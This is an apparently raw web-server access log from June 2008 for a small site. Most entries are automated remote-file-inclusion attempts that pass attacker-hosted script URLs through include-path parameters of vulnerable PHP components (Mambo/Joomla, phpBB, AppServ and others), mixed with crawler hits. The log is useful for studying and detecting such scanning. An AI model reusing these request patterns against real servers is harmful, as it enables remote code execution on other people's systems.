208.75.225.10 - - [25/Jun/2008:12:04:38 -0700] "GET /logs/index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/s.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
208.75.225.10 - - [25/Jun/2008:12:04:38 -0700] "GET /logs/index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
208.75.225.10 - - [25/Jun/2008:12:04:40 -0700] "GET /index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/s.txt?? HTTP/1.1" 200 18521 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
208.75.225.10 - - [25/Jun/2008:12:04:41 -0700] "GET /index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/t.txt?? HTTP/1.1" 200 18521 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:04:44 -0700] "GET /logs/index.php?sub=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:04:50 -0700] "GET /logs/index.php?sub=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:12:05:13 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:12:05:14 -0700] "GET /index.php?body=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:05:26 -0700] "GET /logs/solpot.html?body=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:05:28 -0700] "GET /solpot.html?body=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:05:31 -0700] "GET /logs/access.log/avatar.php?page=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:05:51 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:06:27 -0700] "GET /logs/access.log/index.php?opcao=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:06:29 -0700] "GET /index.php?opcao=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 200 18487 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:06:30 -0700] "GET /logs/index.php?opcao=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:06:38 -0700] "GET /logs/access_080118.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_user_extended&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:06:38 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_user_extended&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:07:02 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:07:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:07:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.161 - - [25/Jun/2008:12:07:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:07:30 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:07:31 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:07:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:07:38 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:07:38 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:12:07:42 -0700] "GET /logs/access_080118.log/index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:07:42 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.115 - - [25/Jun/2008:12:07:43 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 17261 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:07:51 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:08:42 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:08:47 -0700] "GET /logs/index.php?option=com_creation3d&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:08:51 -0700] "GET /index.php?option=com_creation3d&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 200 18557 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:09:11 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:09:17 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:09:21 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:09:22 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:09:29 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:09:34 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:09:34 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:09:34 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:09:36 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1048576 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:09:49 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:09:50 -0700] "GET /logs/access_080129.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:09:51 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:09:54 -0700] "GET /logs/access_080222.log/solpot.html?body=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:09:55 -0700] "GET /solpot.html?body=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:09:56 -0700] "GET /logs/solpot.html?body=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:12:09:57 -0700] "GET /logs/access_080321.log/solpot.html?body=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:10:05 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1310720 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:07 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:07 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:08 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:08 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:08 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:08 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:08 -0700] "GET /logs/access_080225.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:08 -0700] "GET /logs/access_080225.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:10:12 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:10:12 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:10:12 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:10:12 -0700] "GET /logs/access_080225.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:10:24 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1769472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:12:10:33 -0700] "GET /logs/access_080218.log/index.php?pag=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.159.184.246 - - [25/Jun/2008:12:10:45 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1893701 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
193.252.3.200 - - [25/Jun/2008:12:10:45 -0700] "GET /index.php?body=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:56 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:56 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:56 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:10:56 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:12:11:02 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tnwnepal.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:12:11:02 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tnwnepal.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:12:11:02 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tnwnepal.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:11:04 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:11:05 -0700] "GET /facileforms.frame.php?ff_compath=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:11:05 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:11:05 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:11:13 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:11:14 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.195.30.208 - - [25/Jun/2008:12:11:19 -0700] "GET /logs/access_080223.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:11:36 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:12:11:38 -0700] "GET /logs/access.log/index.php?side=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:11:38 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:12:11:42 -0700] "GET /index.php?side=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 200 18491 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:12:11:43 -0700] "GET /logs/index.php?side=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:11:49 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:11:59 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:12:35 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:12:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:12:35 -0700] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:12:47 -0700] "GET /logs/access_080507.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:12:12:51 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:12:52 -0700] "GET /logs/scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:12:52 -0700] "GET /scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:12:54 -0700] "GET /logs/scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:12:55 -0700] "GET /scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:13:57 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:14:06 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:14:13 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.180 - - [25/Jun/2008:12:14:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.95 - - [25/Jun/2008:12:14:33 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
205.234.186.154 - - [25/Jun/2008:12:14:33 -0700] "GET /index.php?side=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 200 18382 "-" "libwww-perl/5.810" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:14:45 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:14:45 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:15:06 -0700] "GET /logs/access.log//index.php?option=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:15:07 -0700] "GET //index.php?option=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 200 18391 "-" "libwww-perl/5.50" "www.dmulk.com"
198.65.55.186 - - [25/Jun/2008:12:15:07 -0700] "GET /logs//index.php?option=http://199.238.139.160/images/rox.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:24 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:24 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:24 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:24 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:25 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:25 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:25 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:25 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:25 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:25 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:26 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:26 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:30 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:30 -0700] "GET /main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:30 -0700] "GET /logs/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:48 -0700] "GET /logs/access_071230.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [25/Jun/2008:12:15:48 -0700] "GET /logs/access_071230.log/main.php?appserv_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
